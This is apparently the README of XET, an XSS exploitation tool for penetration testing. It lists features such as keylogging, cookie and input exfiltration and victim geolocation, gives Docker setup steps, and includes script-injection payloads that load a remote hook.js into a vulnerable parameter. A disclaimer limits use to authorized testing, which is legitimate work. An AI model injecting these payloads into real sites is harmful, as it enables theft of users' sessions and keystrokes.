XSS Exploitation Tool (XET) is a penetration testing tool designed to exploit Cross-Site Scripting vulnerabilities.
- Technical Data about victim browser
- Geolocation of the victim
- Snapshot of the hooked/visited page
- Source code of the hooked/visited page
- Exfiltrate input field data
- Exfiltrate cookies
KeyloggingDisplay alert boxRedirect user- Visualisation mode
Copy the .env.example file to .env and adjust the values as needed.
REMOTE_* variables define the address and port through which the victim communicates with the server (to load the hook or to communicate via WebSocket).
SSL_ENABLED determines whether the server should run with HTTPS enabled.
Make sure to change all default passwords and keys for your environment.
If SSL_ENABLED=true, you must provide a certificate and private key in the following directories:
/app-xet/certs/certificate/apache-certificate.crt
/app-xet/certs/private_key/apache-private.key
You can generate you own certificate with the following command:
openssl req -x509 -newkey rsa:4096 -nodes \
-keyout apache-private.key \
-out apache-certificate.crt \
-days 365 \
-subj "/CN=127.0.0.1"
Place the generated files in the appropriate folders.
Start the Docker environment:
$ docker-compose up -d
The server itself is available at http://127.0.0.1:8000.
The demo application already includes the call to the malicious script hook.js.
To access it, simply visit http://127.0.0.1:8088.
If you are not using the provided demo app, you can inject the hook with:
?vulnerable_param=<script src="http://127.0.0.1:8000/hook.js"></script>
?vulnerable_param=<script src="https://127.0.0.1:8443/hook.js"></script>
This tool is intended for educational and research purposes only and must be used exclusively in authorized penetration testing environments. Unauthorized access or testing of systems you do not own or have explicit permission to assess is illegal. The author is not responsible for any misuse of this tool.
This project is licensed under the GPL-3.0.
